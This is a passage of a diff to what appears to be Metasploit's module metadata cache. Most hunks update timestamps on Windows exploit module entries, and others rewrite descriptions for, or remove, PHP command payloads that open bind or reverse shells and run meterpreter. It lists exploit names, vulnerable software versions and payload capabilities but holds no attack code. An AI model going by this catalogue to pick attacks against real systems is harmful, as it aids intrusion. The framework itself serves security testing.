+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/apple_quicktime_pnsize",
@@ -142568,7 +142805,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/audio_wkstn_pls",
@@ -143045,7 +143282,7 @@
    "targets": [
      "CCMPlayer 1.5"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ccmplayer_m3u_bof",
@@ -143198,7 +143435,7 @@
    "targets": [
      "Csound 5.15 / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2023-03-23 10:19:30 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/csound_getnum_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/csound_getnum_bof",
@@ -143503,7 +143740,7 @@
    "targets": [
      "Windows XP SP2"
    ],
-    "mod_time": "2023-03-23 10:19:30 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/digital_music_pad_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/digital_music_pad_pls",
@@ -144026,7 +144263,7 @@
    "targets": [
      "Free Download Manager 3.0 (Build 844)"
    ],
-    "mod_time": "2023-03-23 10:19:30 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/fdm_torrent.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/fdm_torrent",
@@ -144258,7 +144495,7 @@
    "targets": [
      "Windows XP SP3 EN"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/free_mp3_ripper_wav",
@@ -144597,7 +144834,7 @@
    "targets": [
      "HT-MP3Player 1.0"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ht_mp3player_ht3_bof",
@@ -145009,7 +145246,7 @@
    "targets": [
      "Windows Universal DEP & ASLR Bypass"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/magix_musikmaker_16_mmm",
@@ -145298,7 +145535,7 @@
    "targets": [
      "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mini_stream_pls_bof",
@@ -145333,7 +145570,7 @@
    "targets": [
      "Windows Universal Generic DEP & ASLR Bypass"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mjm_coreplayer2011_s3m",
@@ -145368,7 +145605,7 @@
    "targets": [
      "Windows Universal Generic DEP & ASLR Bypass"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mjm_quickplayer_s3m",
@@ -146121,7 +146358,7 @@
    "targets": [
      "Windows XP SP2 English"
    ],
-    "mod_time": "2021-02-13 04:10:13 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms_visual_basic_vbp",
@@ -146970,7 +147207,7 @@
      "WinSrv 2000 SP2 English",
      "WinSrv 2003 Enterprise Edition SP1 (v1023) English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/safenet_softremote_groupname",
@@ -147646,7 +147883,7 @@
    "targets": [
      "Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/videospirit_visprj.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/videospirit_visprj",
@@ -147942,7 +148179,7 @@
    "targets": [
      "VUPlayer 2.49"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vuplayer_cue",
@@ -147976,7 +148213,7 @@
    "targets": [
      "VUPlayer 2.49"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vuplayer_m3u",
@@ -148218,7 +148455,7 @@
      "WinXP SP3 Spanish (bypass DEP)",
      "WinXP SP2/SP3 English  (bypass DEP)"
    ],
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/wireshark_mpeg_overflow",
@@ -148257,7 +148494,7 @@
    "targets": [
      "Win32 Universal (Generic DEP & ASLR Bypass)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/wireshark_packet_dect.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/wireshark_packet_dect",
@@ -149035,7 +149272,7 @@
      "Windows XP SP3 - English",
      "Windows Server 2003 - English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/comsnd_ftpd_fmtstr",
@@ -149838,7 +150075,7 @@
      "httpdx 1.4.6b - Windows XP SP3 English",
      "httpdx 1.5 - Windows XP SP3 English"
    ],
-    "mod_time": "2022-08-08 01:40:15 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/ftp/httpdx_tolog_format.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/httpdx_tolog_format",
@@ -150646,7 +150883,7 @@
    "targets": [
      "XP Universal"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/ftp/seagull_list_reply.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/seagull_list_reply",
@@ -150890,7 +151127,7 @@
      "Automatic Targeting",
      "vftpd 1.31 - Windows XP SP3 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/ftp/vermillion_ftpd_port.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/vermillion_ftpd_port",
@@ -151773,7 +152010,7 @@
    "targets": [
      "Windows 2000 Pro All - English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/http/amlibweb_webquerydll_app.rb",
    "is_install_path": true,
    "ref_name": "windows/http/amlibweb_webquerydll_app",
@@ -151946,7 +152183,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb",
    "is_install_path": true,
    "ref_name": "windows/http/apache_mod_rewrite_ldap",
@@ -152181,7 +152418,7 @@
      "BadBlue EE 2.7 Universal",
      "BadBlue 2.72b Universal"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/http/badblue_passthru.rb",
    "is_install_path": true,
    "ref_name": "windows/http/badblue_passthru",
@@ -152363,7 +152600,7 @@
    "targets": [
      "Windows XP SP3 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/http/belkin_bulldog.rb",
    "is_install_path": true,
    "ref_name": "windows/http/belkin_bulldog",
@@ -155263,7 +155500,7 @@
      "HP OpenView Network Node Manager 7.50",
      "HP OpenView Network Node Manager 7.53"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb",
    "is_install_path": true,
    "ref_name": "windows/http/hp_nnm_getnnmdata_hostname",
@@ -155311,7 +155548,7 @@
      "HP OpenView Network Node Manager 7.50",
      "HP OpenView Network Node Manager 7.53"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb",
    "is_install_path": true,
    "ref_name": "windows/http/hp_nnm_getnnmdata_icount",
@@ -155359,7 +155596,7 @@
      "HP OpenView Network Node Manager 7.50",
      "HP OpenView Network Node Manager 7.53"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb",
    "is_install_path": true,
    "ref_name": "windows/http/hp_nnm_getnnmdata_maxage",
@@ -156617,7 +156854,7 @@
      "httpdx 1.4 - Windows XP SP3 English",
      "httpdx 1.4 - Windows 2003 SP2 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/http/httpdx_handlepeer.rb",
    "is_install_path": true,
    "ref_name": "windows/http/httpdx_handlepeer",
@@ -156670,7 +156907,7 @@
      "httpdx 1.5 - Windows XP SP3 English",
      "Debug target"
    ],
-    "mod_time": "2023-05-30 10:56:41 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/http/httpdx_tolog_format.rb",
    "is_install_path": true,
    "ref_name": "windows/http/httpdx_tolog_format",
@@ -161756,7 +161993,7 @@
      "Windows 2000 Pro English All",
      "Windows XP Pro SP0/SP1 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/http/steamcast_useragent.rb",
    "is_install_path": true,
    "ref_name": "windows/http/steamcast_useragent",
@@ -163066,7 +163303,7 @@
    "targets": [
      "Microsoft Windows Server 2003 R2 SP2 x86"
    ],
-    "mod_time": "2024-01-22 19:12:21 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb",
    "is_install_path": true,
    "ref_name": "windows/iis/iis_webdav_scstoragepathfromurl",
@@ -169043,7 +169280,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2025-05-21 10:45:08 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/local/pxeexploit.rb",
    "is_install_path": true,
    "ref_name": "windows/local/pxeexploit",
@@ -170644,7 +170881,7 @@
      "Windows 2000 Pro All English",
      "Windows XP Pro SP0/SP1 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/misc/bigant_server.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/bigant_server",
@@ -170682,7 +170919,7 @@
      "Windows 2000 Pro All English",
      "Windows XP Pro SP0/SP1 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/misc/bigant_server_250.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/bigant_server_250",
@@ -173574,7 +173811,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/misc/nettransport.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/nettransport",
@@ -173752,7 +173989,7 @@
    "targets": [
      "POP Peeper v3.4"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/misc/poppeeper_date.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/poppeeper_date",
@@ -173787,7 +174024,7 @@
    "targets": [
      "POP Peeper v3.4"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/misc/poppeeper_uidl.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/poppeeper_uidl",
@@ -174222,7 +174459,7 @@
    "targets": [
      "Windows XP SP3 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/misc/talkative_response.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/talkative_response",
@@ -174675,7 +174912,7 @@
    "targets": [
      "Win32 Universal (Generic DEP & ASLR Bypass)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/misc/wireshark_packet_dect.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/wireshark_packet_dect",
@@ -175579,7 +175816,7 @@
      "Novell GroupWise Messenger 2.0 Client",
      "Novell GroupWise Messenger 1.0 Client"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/novell/groupwisemessenger_client.rb",
    "is_install_path": true,
    "ref_name": "windows/novell/groupwisemessenger_client",
@@ -177875,7 +178112,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/sunway_force_control_netdbsrv",
@@ -195861,78 +196098,6 @@
    "payload_type": 1,
    "staged": false
  },
-  "payload_cmd/unix/php/bind_perl": {
-    "name": "PHP Exec, PHP Command Shell, Bind TCP (via Perl)",
-    "fullname": "payload/cmd/unix/php/bind_perl",
-    "aliases": [],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "payload",
-    "author": [
-      "Spencer McIntyre",
-      "msutovsky-r7",
-      "Samy <samy@samy.pl>",
-      "cazz <bmc@shmoo.com>"
-    ],
-    "description": "Execute a PHP payload from a command.\n\nListen for a connection and spawn a command shell via perl (persistent)",
-    "references": [],
-    "platform": "Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": null,
-    "autofilter_services": null,
-    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
-    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
-    "is_install_path": true,
-    "ref_name": "cmd/unix/php/bind_perl",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {},
-    "session_types": false,
-    "needs_cleanup": false,
-    "payload_type": 8,
-    "adapter_refname": "cmd/unix/php",
-    "adapted_refname": "php/bind_perl",
-    "staged": false
-  },
-  "payload_cmd/unix/php/bind_perl_ipv6": {
-    "name": "PHP Exec, PHP Command Shell, Bind TCP (via perl) IPv6",
-    "fullname": "payload/cmd/unix/php/bind_perl_ipv6",
-    "aliases": [],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "payload",
-    "author": [
-      "Spencer McIntyre",
-      "msutovsky-r7",
-      "Samy <samy@samy.pl>",
-      "cazz <bmc@shmoo.com>"
-    ],
-    "description": "Execute a PHP payload from a command.\n\nListen for a connection and spawn a command shell via perl (persistent) over IPv6",
-    "references": [],
-    "platform": "Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": null,
-    "autofilter_services": null,
-    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
-    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
-    "is_install_path": true,
-    "ref_name": "cmd/unix/php/bind_perl_ipv6",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {},
-    "session_types": false,
-    "needs_cleanup": false,
-    "payload_type": 8,
-    "adapter_refname": "cmd/unix/php",
-    "adapted_refname": "php/bind_perl_ipv6",
-    "staged": false
-  },
  "payload_cmd/unix/php/bind_php": {
    "name": "PHP Exec, PHP Command Shell, Bind TCP (via PHP)",
    "fullname": "payload/cmd/unix/php/bind_php",
@@ -195946,7 +196111,7 @@
      "egypt <egypt@metasploit.com>",
      "diaul <diaul@devilopers.org>"
    ],
-    "description": "Execute a PHP payload from a command.\n\nListen for a connection and spawn a command shell via php",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nListen for a connection and spawn a command shell via php",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -195954,7 +196119,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/bind_php",
@@ -195982,7 +196147,7 @@
      "egypt <egypt@metasploit.com>",
      "diaul <diaul@devilopers.org>"
    ],
-    "description": "Execute a PHP payload from a command.\n\nListen for a connection and spawn a command shell via php (IPv6)",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nListen for a connection and spawn a command shell via php (IPv6)",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -195990,7 +196155,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/bind_php_ipv6",
@@ -196017,7 +196182,7 @@
      "msutovsky-r7",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Execute a PHP payload from a command",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196025,7 +196190,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/download_exec",
@@ -196052,7 +196217,7 @@
      "msutovsky-r7",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Execute a PHP payload from a command.\n\nExecute a single system command",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nExecute a single system command",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196060,7 +196225,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/exec",
@@ -196087,7 +196252,7 @@
      "msutovsky-r7",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Execute a PHP payload from a command.\n\nRun a meterpreter server in PHP.\n\nListen for a connection",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in PHP.\n\nListen for a connection",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196095,7 +196260,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/meterpreter/bind_tcp",
@@ -196124,7 +196289,7 @@
      "msutovsky-r7",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Execute a PHP payload from a command.\n\nRun a meterpreter server in PHP.\n\nListen for a connection over IPv6",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in PHP.\n\nListen for a connection over IPv6",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196132,7 +196297,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/meterpreter/bind_tcp_ipv6",
@@ -196162,7 +196327,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Execute a PHP payload from a command.\n\nRun a meterpreter server in PHP.\n\nListen for a connection over IPv6 with UUID Support",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in PHP.\n\nListen for a connection over IPv6 with UUID Support",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196170,7 +196335,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/meterpreter/bind_tcp_ipv6_uuid",
@@ -196200,7 +196365,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Execute a PHP payload from a command.\n\nRun a meterpreter server in PHP.\n\nListen for a connection with UUID Support",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in PHP.\n\nListen for a connection with UUID Support",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196208,7 +196373,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/meterpreter/bind_tcp_uuid",
@@ -196237,7 +196402,7 @@
      "msutovsky-r7",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Execute a PHP payload from a command.\n\nRun a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196245,7 +196410,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/meterpreter/reverse_tcp",
@@ -196275,7 +196440,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Execute a PHP payload from a command.\n\nRun a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196283,7 +196448,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/meterpreter/reverse_tcp_uuid",
@@ -196312,7 +196477,7 @@
      "msutovsky-r7",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Execute a PHP payload from a command",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196320,7 +196485,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/meterpreter_reverse_tcp",
@@ -196335,41 +196500,6 @@
    "adapted_refname": "php/meterpreter_reverse_tcp",
    "staged": false
  },
-  "payload_cmd/unix/php/reverse_perl": {
-    "name": "PHP Exec, PHP Command, Double Reverse TCP Connection (via Perl)",
-    "fullname": "payload/cmd/unix/php/reverse_perl",
-    "aliases": [],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "payload",
-    "author": [
-      "Spencer McIntyre",
-      "msutovsky-r7",
-      "cazz <bmc@shmoo.com>"
-    ],
-    "description": "Execute a PHP payload from a command.\n\nCreates an interactive shell via perl",
-    "references": [],
-    "platform": "Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": null,
-    "autofilter_services": null,
-    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
-    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
-    "is_install_path": true,
-    "ref_name": "cmd/unix/php/reverse_perl",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {},
-    "session_types": false,
-    "needs_cleanup": false,
-    "payload_type": 8,
-    "adapter_refname": "cmd/unix/php",
-    "adapted_refname": "php/reverse_perl",
-    "staged": false
-  },
  "payload_cmd/unix/php/reverse_php": {
    "name": "PHP Exec, PHP Command Shell, Reverse TCP (via PHP)",
    "fullname": "payload/cmd/unix/php/reverse_php",
@@ -196382,7 +196512,7 @@
      "msutovsky-r7",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Execute a PHP payload from a command.\n\nReverse PHP connect back shell with checks for disabled functions",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nReverse PHP connect back shell with checks for disabled functions",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196390,7 +196520,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/reverse_php",
@@ -196417,7 +196547,7 @@
      "msutovsky-r7",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Execute a PHP payload from a command.\n\nSpawn a shell on the established connection to\nthe webserver.  Unfortunately, this payload\ncan leave conspicuous evil-looking entries in the\napache error logs, so it is probably a good idea\nto use a bind or reverse shell unless firewalls\nprevent them from working.  The issue this\npayload takes advantage of (CLOEXEC flag not set\non sockets) appears to have been patched on the\nUbuntu version of Apache and may not work on\nother Debian-based distributions.  Only tested on\nApache but it might work on other web servers\nthat leak file descriptors to child processes.",
+    "description": "Execute a PHP payload as an OS command from a Posix-compatible shell.\n\nSpawn a shell on the established connection to\nthe webserver.  Unfortunately, this payload\ncan leave conspicuous evil-looking entries in the\napache error logs, so it is probably a good idea\nto use a bind or reverse shell unless firewalls\nprevent them from working.  The issue this\npayload takes advantage of (CLOEXEC flag not set\non sockets) appears to have been patched on the\nUbuntu version of Apache and may not work on\nother Debian-based distributions.  Only tested on\nApache but it might work on other web servers\nthat leak file descriptors to child processes.",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196425,7 +196555,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-27 16:35:34 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/php.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/php/shell_findsock",
@@ -196512,7 +196642,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command.\n\nExecute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.",
